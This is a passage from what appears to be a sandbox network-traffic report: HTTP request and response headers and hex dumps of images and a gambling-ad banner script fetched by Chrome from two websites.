                                          2025-01-12 00:17:06 UTC6379INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 7c 50 4c 54 45 00 00 00 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 11 25 4e 31 9d fb 11 25 4e 11 25 4e 2d a6 fc 11 25 4e 11 25 4e 11 25 4e 11 25 4e 27 93 fe 30 a9 f8 11 25 4e 11 25 4e 35 96 fc 2e 9d fd 4b c3 f8 38 c5 f7 26 99 fe 2d 91 ff 35 b8 f9 44 d3 f3 70 d0 f8 40 b6 f6 31 99 fd 22 95 ff 11 25 4e 24 b7 fc 11 25 4e 4f c0 f8 11 25 4e 2e 9d fc 60 c9 f7 11 25 4e 46 d7 f1 30 91 fe 2a 8f fe 21 69 ff 2a 94 fe 29 b7 fb 24 77 fe 20 5e ff 24 ad fe 11 25 4e 36 92 fd 6a cc f7 65 c9 f7 35 e3 ea 39 a4 f9 20 61 ff 4a b7 f4 20 bf f9 31 df ea 3a a4 f8 2a d2 f7 66 c9 f7 2a d6 f5 23 6b fe 36 9c fb 22 ad fe 45 b2 f5 21 65 ff 3d
                                          Data Ascii: PNGIHDR2|PLTE%N%N%N%N%N%N%N%N%N%N1%N%N-%N%N%N%N'0%N%N5.K8&-5Dp@1"%N$%NO%N.`%NF0*!i*)$w ^$%N6je59 aJ 1:*f*#k6"E!e=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          77192.168.2.449827122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC613OUTGET /imgs/sansanqiqi.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:06 GMT
                                          Content-Type: image/png
                                          Content-Length: 9166
                                          Last-Modified: Tue, 15 Oct 2024 17:22:51 GMT
                                          Connection: close
                                          ETag: "670ea4eb-23ce"
                                          Expires: Tue, 11 Feb 2025 00:17:06 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC9166INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 23 80 49 44 41 54 78 9c ed 9d 7b 90 5d 47 79 e0 7f 5f df 3b 23 c9 f2 58 83 e5 87 46 c6 d6 d8 96 6d c0 18 0d 06 8c 03 0e 1e e2 0d 60 42 05 11 d8 5d 2a 0b 85 f3 60 49 51 11 71 76 ff 58 8a 4a 15 6c 52 b5 81 64 c3 ba 4a bc 6a 21 44 4b 42 42 fe 33 8f 80 81 80 c7 f8 09 76 e2 f1 fb 25 c3 48 b2 3d d6 c3 f6 48 a3 87 35 73 4f 7f fb 47 9f 3b 73 e7 ce bd e7 f4 e9 73 ee cc 48 ea 9f eb 58 23 9d 3e dd df 9c d3 5f 3f be fe fa 6b 51 55 22 91 48 67 cc 72 0b 10 89 ac 64 a2 82 44 22 19 44 05 89 44 32 88 0a 12 89 64 10 15 24 12 c9 20 2a 48 24 92 41 54 90 48 24 83 a8 20 91 48 06 51 41 22 91 0c a2 82 44 22 19 44
                                          Data Ascii: PNGIHDRXpHYs#IDATx{]Gy_;#XFm`B]*`IQqvXJlRdJj!DKBB3v%H=H5sOG;ssHX#>_?kQU"HgrdD"DD2d$ *H$ATH$ HQA"D"D


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          78192.168.2.449830122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC351OUTGET /banner.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:06 UTC378INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:06 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 2558
                                          Last-Modified: Fri, 10 Jan 2025 09:48:28 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780ecec-9fe"
                                          Expires: Sun, 12 Jan 2025 12:17:06 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:06 UTC2558INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 73 74 72 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 20 20 63 6f 6e 73 74 20 69 64 4d 61 74 63 68 20 3d 20 73 74 72 2e 6d 61 74 63 68 28 2f 5c 3f 69 64 3d 28 5c 64 2b 29 2f 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 69 64 20 3d 20 69 64 4d 61 74 63 68 20 3f 20 70 61 72 73 65 49 6e 74 28 69 64 4d 61 74 63 68 5b 31 5d 2c 20 31 30 29 20 3a 20 30 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 20 6f 62 6a 5f 73 6c 69 64 65 73 20 3d 20 5b 0a 20 20 20 20 20 20 20 20 7b 20 69 64 3a 20 31 2c 20 74 69 74 6c 65 3a 20 22 42 45 54 33 36 35 22 2c 20 75 72 6c 3a 20 22 68 74 74 70 73 3a 2f 2f 35 35 31 30 30 30 6c 2e 63 63 22 2c 20 73 72 63 3a 20 22 69 6d 67 73 2f 62 61 6e 6e
                                          Data Ascii: $(function() { const str = window.location.href; const idMatch = str.match(/\?id=(\d+)/); const id = idMatch ? parseInt(idMatch[1], 10) : 0; const obj_slides = [ { id: 1, title: "BET365", url: "https://551000l.cc", src: "imgs/bann


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          79192.168.2.449831154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC401OUTGET /__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/png
                                          Content-Length: 1337955
                                          Last-Modified: Fri, 10 Jan 2025 07:04:29 GMT
                                          Connection: close
                                          ETag: "6780c67d-146a63"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 f4 00 00 02 40 08 02 00 00 00 85 50 af 61 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 20 00 49 44 41 54 78 9c 94 bd 69 b8 6d 49 51 20 1a 11 99 b9 86 bd f7 19 ef 5c f7 de 1a a1 a0 b0 0a 10 10 79 cd 43 3f 2c 11 c7 56 5b 81 b6 55 44 e5 b3 bb 71 e8 cf 07 d2 1f bc 46 50 11 19 da 56 71 68 7d 3e 5e 6b 3b 37 ef 03 15 a5 6d 9c ca 81 07 52 08 c5 58 03 35 dd ba f3 bd 75 ef 3d d3 1e d6 ca cc 88 f7 23 d6 ca 9d 67 9f 53 85 ae 1f fb ec b3 76 ae 1c 22 23 63 8e 58 f8 0f 1f fd bb 23 47 0f 35 d3 ad ef fc ae 97 dd 71 fb 6d e7 ce 3f fa f8 a5 8b de 4f 6f ba e9 a6 d3 67 4e 91 b5 6b 6b 6b 65 5d 5e b9 7a d9 55 65 59 96 e3 9d 59 0c 38 99 cc 6e b9 f9 d6 d9 94 39 9a 03 eb 47 9f 79 c7 73 ff b7 17 7c 25
                                          Data Ascii: PNGIHDR@PapHYs!! IDATximIQ \yC?,V[UDqFPVqh}>^k;7mRX5u=#gSv"#cX#G5qm?OogNkkke]^zUeYY8n9Gys|%
                                          2025-01-12 00:17:07 UTC16384INData Raw: 89 31 7a 1f b6 b6 c7 65 e9 00 78 65 ad 9a cc ae 2c ad d0 87 fe e2 0f bf fa ab be 71 32 9d 39 3b 8a 3e 30 88 73 a5 f7 cd d5 ab 1b af ff b1 37 b0 84 77 be f3 1d 45 61 4f 9e 3c 69 6d 81 28 21 b4 97 2f 5f bc f5 d6 5b 43 8c 2c 7d 81 0a 42 b2 86 a3 4f c1 6e 04 68 8d 19 0e 06 55 e9 62 24 63 8c 2a 51 fd 49 23 66 06 dc 75 44 73 c6 76 f5 ea d5 ba ae 11 11 48 88 d0 fb 50 b8 02 58 ac 35 02 11 90 07 c3 aa aa aa 7a 50 76 31 7d 19 ea a4 0b 33 6d 47 2d 29 6a d0 45 14 22 60 1f ad 2d 90 05 30 1c 3f 76 24 84 30 1a 8d 86 43 7d 15 90 48 97 3e c1 00 b2 50 27 1c fb 80 67 66 de dc dc ec 19 a1 a8 d1 50 53 f5 8c b1 c8 d1 11 36 31 38 c2 63 87 0f 41 0c 9a 68 be 77 92 c9 15 c0 2c a9 d6 34 00 30 47 10 01 14 15 ca 8d c1 b2 74 45 61 0b 43 a3 ba 22 a2 e4 65 ed 34 7c 4d fb d1 14 b9 de 1a
                                          Data Ascii: 1zexe,q29;>0s7wEaO<im(!/_[C,}BOnhUb$c*QI#fuDsvHPX5zPv1}3mG-)jE"`-0?v$0C}H>P'gfPS618cAhw,40GtEaC"e4|M
                                          2025-01-12 00:17:07 UTC16384INData Raw: bc 04 e0 92 b7 5e 4d 40 4d 29 0b db 13 42 4d a8 35 d3 99 78 bf d7 b4 75 cf 67 c7 39 2a 2a 14 d7 3a cf 12 6c bf 5b f0 06 f6 f7 1a e8 67 08 12 23 48 b2 1b 64 8c 39 0e 27 52 9c e3 1f fe f0 fb 81 81 3e 00 9d a6 71 9a c6 44 8a 48 01 68 93 ee 9b 8c f4 5d a5 8a a4 06 45 a8 35 28 a9 53 f3 4f 91 44 0e 8a e4 b9 e7 3f e7 b7 bf ff 8d 17 b8 5e e0 1e 38 34 c2 1d 41 44 4a a7 5a cb 3b ef bc 9d 73 8c e3 b0 5c 0e e2 38 1c 1e 1e 6c 34 e6 0c d8 37 ec 2e 63 cc 58 4c 33 96 7d 0b e3 d9 05 e7 5c 38 6c d3 a6 0d c7 1d bf 65 c3 c6 75 61 d8 a8 d7 6b af 78 d5 2b fc c0 79 eb 5b df bc 7f ff ee 95 2b 96 bc fb da 77 9e 71 e6 a9 95 6a b0 f5 a4 13 3e fb d9 cf f8 be 3f 3c 3c 5c af d7 8d 73 ac 10 42 29 2a 52 b3 02 40 10 04 97 5c 72 c9 85 17 5e 70 dc 71 c7 5e 7c f1 c5 9b 37 6f 1e 1d 3d 38 30
                                          Data Ascii: ^M@M)BM5xug9**:l[g#Hd9'R>qDHh]E5(SOD?^84ADJZ;s\8l47.cXL3}\8leuakx+y[+wqj>?<<\sB)*R@\r^pq^|7o=80
                                          2025-01-12 00:17:07 UTC16384INData Raw: ce 3a 3f f0 e9 99 67 f7 5e 7a c9 d5 81 44 a5 58 2e 3f bb a7 ab 73 d1 e2 e5 61 48 17 5d f2 bc 42 a1 43 4a 1d 79 3a 69 42 e4 5c f0 9a 17 5c 77 ed f5 32 54 81 5f db b0 e1 22 a5 94 a9 97 e0 7b 61 6c 3c 4c 08 52 7c a4 80 03 ea 34 22 a8 07 8a 10 51 ca ed b6 e9 c8 41 4b 24 46 c2 95 36 9d 46 8e 4c 6b 95 c4 af 02 00 b3 a2 44 8b da 44 93 a5 35 2c a6 08 7b 63 9f 4d 50 87 89 9f 7c 94 46 1f 88 48 47 2a 7c c3 8f 36 0b 78 11 9b 1a 0f be 38 39 0e 00 a6 6e 1c 00 98 42 96 44 44 a8 4c 41 45 a9 22 4a 10 4a 0d c8 92 ba 91 4d c7 21 7d 0a 4c 7c 4b b4 38 c9 0b 3a b2 3f 23 22 b5 f8 51 b0 d3 a5 08 48 87 2e 27 4b c1 18 33 8c bb f9 b4 f1 2e 33 49 b6 a2 b1 11 00 b6 f1 fb 8d 8f 6a f3 57 d2 a7 db 6c 77 9b 3e a7 4d 16 64 46 68 d4 28 cd 4f d6 e5 c6 54 b0 e2 0c 6e a2 66 9a 69 99 c4 04 f8
                                          Data Ascii: :?g^zDX.?saH]BCJy:iB\\w2T_"{al<LR|4"QAK$F6FLkDD5,{cMP|FHG*|6x89nBDDLAE"JJM!}L|K8:?#"QH.'K3.3IjWlw>MdFh(OTnfi
                                          2025-01-12 00:17:07 UTC16384INData Raw: 45 7c a8 46 e9 c2 9b 79 e7 ce 9d c1 8d e5 e3 9e bc 9a 05 e5 3c b5 62 7d f0 7d 72 00 40 78 4c c9 8e 64 70 60 71 5a 02 b4 e4 2c a4 b2 7c 49 f4 e5 64 25 d3 12 1f 3c 6f a4 4d 75 90 08 73 39 77 ee 47 32 54 95 22 59 6a cc 51 56 90 1f e4 c4 21 b4 53 54 6e 5a 11 ce 6a 34 45 d9 91 18 a4 7f ef a0 96 05 54 5d 56 d9 b5 c8 51 11 66 42 5c 51 6e a5 e3 ae da 6c a0 fd 30 53 0c 83 45 35 c3 07 22 45 07 26 a5 b6 23 59 02 63 c1 c3 34 15 eb 98 92 ce 2a 20 48 a9 9f 03 bf 56 f4 1d f0 97 80 12 82 6a 1c 14 54 9b ec 68 e4 89 8f 50 54 64 ab 0d fc 70 85 ff bc 7c 28 09 e9 80 af d7 06 51 00 0f 0f d8 6c a0 29 1e 3a ab 57 41 17 c0 81 40 0b ea 2d c1 f2 93 ae 11 e4 27 80 02 bd 88 e7 82 1c 09 fd ca b2 2c b7 68 d9 c5 82 49 08 41 9c 31 0f 69 84 61 62 23 bc e4 d4 53 01 51 4a 08 10 9c 2b 16 a2
                                          Data Ascii: E|Fy<b}}r@xLdp`qZ,|Id%<oMus9wG2T"YjQV!STnZj4ET]VQfB\Qnl0SE5"E&#Yc4* HVjThPTdp|(Ql):WA@-',hIA1iab#SQJ+
                                          2025-01-12 00:17:08 UTC16384INData Raw: 2d 75 f5 f5 2e a6 36 b1 e2 db 95 24 a9 4f b6 3f 4b d5 64 2c fa 43 3b fe de ae bb 18 f2 9b c1 87 63 c3 34 4b cc 6e 33 46 09 a1 95 32 50 94 a5 59 57 8e 15 1d b4 49 33 8b 58 9b 49 b0 4d 90 a2 0a cd 35 d2 71 40 3a cc 9b ee 28 b9 7f cd d6 48 62 bb a8 22 9a 77 9b 0f 53 e9 40 b2 c4 b6 4c 6c 4e 4c 08 53 2b c4 da 4f 0a 09 ed a0 ed 5c cc 1e 63 bd b4 c3 84 76 fc 6b c6 79 48 6e b1 a8 9d 16 e3 9a 24 2e a5 76 94 da 6f 3b 9c 84 b4 d9 8e 3d 94 ad c1 4a 3a 97 76 83 65 16 e3 16 e3 4a 6f ad 32 6b a9 7f 19 20 48 92 a1 20 21 a3 e7 16 03 ae 7f 22 21 0b b9 3c 47 26 43 11 fa 81 6d db ae eb aa fb 9f 6a b5 3a 35 35 a5 f4 76 ea a6 c5 f7 7d 22 94 80 dc 72 5d 37 ab fe 72 b9 9c e3 66 80 71 02 0b d0 6e 78 61 b9 da 58 b9 e2 48 04 ce 18 af 56 6b 6a 80 88 2c 08 c2 81 81 81 d7 bf fe ec cb
                                          Data Ascii: -u.6$O?Kd,C;c4Kn3F2PYWI3XIM5q@:(Hb"wS@LlNLS+O\cvkyHn$.vo;=J:veJo2k H !"!<G&Cmj:55v}"r]7rfqnxaXHVkj,
                                          2025-01-12 00:17:08 UTC16384INData Raw: cb d2 1d 02 00 a1 75 18 87 6e 04 77 8c b5 9c 94 12 aa 18 63 ae e7 60 4d d5 38 23 5f 7a c8 10 ef 60 55 ed 47 7a 7d a1 59 3b 3d c0 26 2d 63 b5 cd 9b 37 e3 5c 48 45 68 35 ab d3 e4 3e 19 a7 5e 5f 87 23 0d 30 5f 17 09 94 52 a8 e7 ec 9a b0 81 57 05 24 a9 3f e3 f1 58 28 8d e3 79 a4 ab e9 21 6b 84 9b 5a 54 5d 72 32 51 14 45 51 35 54 b2 51 41 e9 20 67 b5 b2 d3 1c 4d 5a ae 4c 53 c2 35 29 8d e6 6e 9a 73 da e8 e5 34 c5 5e a3 06 a7 a3 0f d5 55 4a 9a 2c e1 e6 2f 13 9f 4f 89 16 f3 41 ff 89 07 85 29 d5 01 7b ad d3 ac e6 5d 24 d6 80 13 dd 31 c6 88 10 8a 80 10 82 db 96 ac 94 68 14 c8 4a 19 ca 65 df e2 36 77 22 6e 95 09 9d bf c7 1e 84 d1 c8 e1 81 94 20 81 53 66 59 96 08 42 ca aa 2a c4 64 8f 54 e7 5e aa 51 5c a6 8f a8 44 c1 7d 20 89 13 e7 e8 e7 f8 a2 84 c4 43 3a e4 db 3a aa
                                          Data Ascii: unwc`M8#_z`UGz}Y;=&-c7\HEh5>^_#0_RW$?X(y!kZT]r2QEQ5TQA gMZLS5)ns4^UJ,/OA){]$1hJe6w"n SfYB*dT^Q\D} C::
                                          2025-01-12 00:17:08 UTC16384INData Raw: 65 c9 92 25 0b 06 fa 98 45 b8 f0 00 84 eb d8 21 0f 84 0c 6c 9b 04 81 27 84 f0 7d b4 0f 61 96 e5 3c f0 c0 83 8c 5a 9e 17 00 c0 e6 2d 1b 1b 5e ed b1 3f fc ee db df fa 3a 25 42 82 b0 29 e3 9c 4b 01 8c 31 db 76 57 ad 3a d8 b1 0b 43 83 4b 3e f0 81 73 19 73 57 ad 5a fd 9b df 3c 58 28 94 dc 7c 31 9f 2b d6 eb 41 3e 5f b4 9d 5c 2e 97 3f e9 c4 53 ee b9 e7 97 94 d2 ae ae 2e 42 08 80 18 dd bb fb ee 5f dc f5 cd 6f 7e 63 e3 c6 57 2f bf fc d2 2f 7c f1 c6 91 1d c3 1d 9d 45 66 01 63 14 00 2c cb 5a b8 70 e1 d6 ad db 28 b1 28 65 94 5a c7 1f 77 f2 e4 e4 54 a1 50 90 c0 1d d7 9a ad 4c da 0e f9 c7 8b 3f d2 df df 6b 59 94 31 f6 99 cf 7c c6 b2 28 ee 4e 29 b1 3e f0 fe 73 cf fa fb 0f 7e fa 53 d7 6f 7c fd 8d a9 a9 d9 30 00 29 25 6a 72 7e d0 60 8c a1 df 35 3a 36 4b e0 78 30 4c 08 41
                                          Data Ascii: e%E!l'}a<Z-^?:%B)K1vW:CK>ssWZ<X(|1+A>_\.?S.B_o~cW//|Efc,Zp((eZwTPL?kY1|(N)>s~So|0)%jr~`5:6Kx0LA
                                          2025-01-12 00:17:08 UTC16384INData Raw: 26 a5 ac d5 6a cf 3c f3 cc 77 bf fb 5d df f3 0a b9 3c 23 14 24 2f 14 0a 8c b1 db 6e bb ed 85 3f bd b4 7b f7 1e d7 29 6c de 3c fc e0 6f 7f c7 68 ce 62 85 93 4f 7e c7 3f 7c e8 23 61 40 c6 c7 66 6c a7 f0 ee bf 7d f7 ab af bf 42 99 f0 83 fa c4 cc 5e e6 ca ef 7e ef 9b 27 9c 78 0c 17 0d 66 81 94 bc 5c 2e 12 8b 02 03 21 9a 9e 48 f5 ba c7 b9 ac d7 bd ab af be a6 b7 b7 1f 80 4a 01 d3 53 55 d7 2d 58 2c c7 39 08 2e ab 95 46 57 57 4f 2e 57 58 30 b8 a8 a7 77 c0 0f e4 8a 95 07 9f 79 e6 07 57 1e b8 fa 93 9f fc ec f5 37 7c be 54 ee b7 ed a2 1f 80 04 92 2f 16 42 11 1c b4 fa 40 0e 41 2e 97 eb e8 e8 08 82 c0 76 ac d7 36 be fa ad 7f ff e6 f0 b6 37 28 05 cf ab 07 81 e7 ba 76 18 fa a8 76 a0 1d 91 10 02 80 f2 50 6e d9 b2 65 c1 c0 90 e3 e4 00 a8 10 02 93 2b f8 be 8f c7 cf 8c d9
                                          Data Ascii: &j<w]<#$/n?{)l<ohbO~?|#a@fl}B^~'xf\.!HJSU-X,9.FWWO.WX0wyW7|T/B@A.v67(vvPne+
                                          2025-01-12 00:17:08 UTC16384INData Raw: 58 19 05 13 f9 05 0c 49 d1 12 7a e6 6c b5 8f 85 49 c5 46 8a e4 43 c7 00 9a 9e 9e 96 52 2a 15 23 e3 c0 14 22 48 86 02 11 00 29 42 18 03 33 ec 41 97 09 6b ea 3f 0b 5b ec 2a fa 25 03 50 64 16 e8 a4 1a 26 25 ad 37 69 22 64 8a 32 92 97 5d 51 af 78 cf 2b 4f 16 92 99 22 d1 ac 30 2f 4a 99 25 b3 26 19 9a 0c e7 b6 42 8e 54 f1 1f 91 7d b0 40 68 39 f4 01 8b ce 46 fd 05 2e 84 7a 95 4c ad 64 55 48 b7 9e 09 f6 88 5d db b3 8a 05 dc 9a 65 bd be d2 77 38 99 11 f4 15 32 48 61 be 54 da a3 21 a9 c5 81 56 2f 4c 31 96 bd 77 0e 40 7b ba 4e d6 fb bc 6c 67 90 35 3d 7b 51 d2 14 8f 39 15 2c 4e 80 f9 d8 32 4d 93 fc fa e9 5f 7d df 0f 82 a0 af af 0f 93 fb 0e e9 4d 84 cc 8e 58 2f 69 61 8c 88 27 9c 70 c2 83 0f 3e 48 96 92 10 82 ae 89 85 61 e8 07 be 52 2a 8e 62 29 e5 d5 57 5d 75 d9 65 97
                                          Data Ascii: XIzlIFCR*#"H)B3Ak?[*%Pd&%7i"d2]Qx+O"0/J%&BT}@h9F.zLdUH]ew82HaT!V/L1w@{Nlg5={Q9,N2M_}MX/ia'p>HaR*b)W]ue


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          80192.168.2.449832154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:06 UTC408OUTGET /__local/B/84/EC/5622D797980B35FCB8DD953CE4C_265C0032_E9AE.jpeg?e=.jpeg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:07 UTC302INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:07 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 59822
                                          Last-Modified: Fri, 10 Jan 2025 07:04:31 GMT
                                          Connection: close
                                          ETag: "6780c67f-e9ae"
                                          Expires: Tue, 11 Feb 2025 00:17:07 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:07 UTC16082INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 00 00 00 00 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 74 72 58 59 5a 00 00 01 64 00 00 00 14 67 58 59 5a 00 00 01 78 00 00 00 14 62 58 59 5a 00 00 01 8c 00 00 00 14 72 54 52 43 00 00 01 a0 00 00 00 28 67 54 52 43 00 00 01 a0 00 00 00 28 62 54 52 43 00 00 01 a0 00 00 00 28 77
                                          Data Ascii: JFIF@ICC_PROFILE0mntrRGB XYZ acsp-desctrXYZdgXYZxbXYZrTRC(gTRC(bTRC(w
                                          2025-01-12 00:17:07 UTC16384INData Raw: 84 5c 32 b4 32 ac 91 e0 3a 9c 8c 8c d7 7e fd ee 2f 92 49 08 e6 24 67 94 01 f8 53 5a e9 6d fe f1 1f f3 85 41 1e 73 41 63 84 d9 9e 3b e2 4f c7 d2 b6 9e 00 1f f2 2f 4f f5 ef 7f f1 5e b1 64 1b 75 ad ab b3 f3 ff 00 22 b4 dd ba 77 bf f8 af 5c 8e ae 3f 81 f8 cd f4 a7 db 8f 35 64 cc 31 e3 c5 80 cf f4 69 3a 18 cd 85 8f 8f e6 23 fe e8 a7 3a c2 86 82 32 aa 7e df 87 f3 45 72 d0 c7 fb 3f 4f 20 74 b7 8f fb a2 bc c3 02 06 3e 3f de 74 43 46 9a b7 b9 a9 03 e4 01 ae 56 3e f6 93 32 79 ab 7d cc 69 c6 b8 39 6f cf f3 7f 5d 70 d3 97 36 53 ff 00 27 9f 6f 8e ff 00 ae ae 0e 01 12 be 79 91 07 ff 00 83 38 d8 f2 4e 7e 59 6c fe ba 6d 0f be 80 53 a8 b7 d2 af 57 c5 66 cf f6 50 d3 5b 4c 8d 8f 5d e9 8a bd ef c6 56 c1 ec c9 6b 77 e5 d1 6d 8f 99 8d 31 fd 21 fb 6a 4b 4a de fe e8 ff 00 d5 a7
                                          Data Ascii: \22:~/I$gSZmAsAc;O/O^du"w\?5d1i:#:2~Er?O t>?tCFV>2y}i9o]p6S'oy8N~YlmSWfP[L]Vkwm1!jKJ
                                          2025-01-12 00:17:07 UTC16384INData Raw: 7e 15 76 ec e7 51 8e 5e 36 83 bb 90 02 d1 32 73 12 4e d8 62 7a f5 39 c7 d6 99 b6 e1 5e 9f c5 51 9c 45 aa a3 7d e5 1f b6 33 3b 76 8d 65 71 c4 da 74 2b a5 5b 5c cf dd ca cc 4a c0 f8 19 03 c7 18 f3 f1 aa 6c 5d 99 71 2c 9d e5 b8 33 2d a9 01 8c 78 60 37 fe 4b 60 1d f3 d2 bd 14 6e e6 2c e4 17 74 38 e5 0a 9b 8d 89 3b 93 f0 a4 f7 b2 ed ce f2 ae 5c 01 cc c8 33 bf fc 7a d7 9c 3f 68 ad 07 28 b8 8f 2e 9a a1 c6 33 f8 ca ef 0c e9 da 9e 93 a4 da d9 db 69 0a 8b 0a 04 3d e5 c2 8e 80 6f b0 de 9b f1 4c 9a 8d 85 9a de 6a 31 da a4 26 64 8f 96 39 1b 9b 07 e5 8e 99 ab 7b 5c cf cc 15 52 11 27 29 3c ad 2e fe 1e 9d 37 3b fc 3c ea b7 da 48 92 5e 0b be 67 44 ef 63 c3 06 1b 84 1c d8 c8 3e 7b 8a bd 1d 6a d7 b0 2b 63 99 61 a6 a8 9c 6d ef f3 95 0d 77 5e d2 75 2d 0e fb 4c b5 bd b3 6b 8b
                                          Data Ascii: ~vQ^62sNbz9^QE}3;veqt+[\Jl]q,3-x`7K`n,t8;\3z?h(.3i=oLj1&d9{\R')<.7;<H^gDc>{j+camw^u-Lk
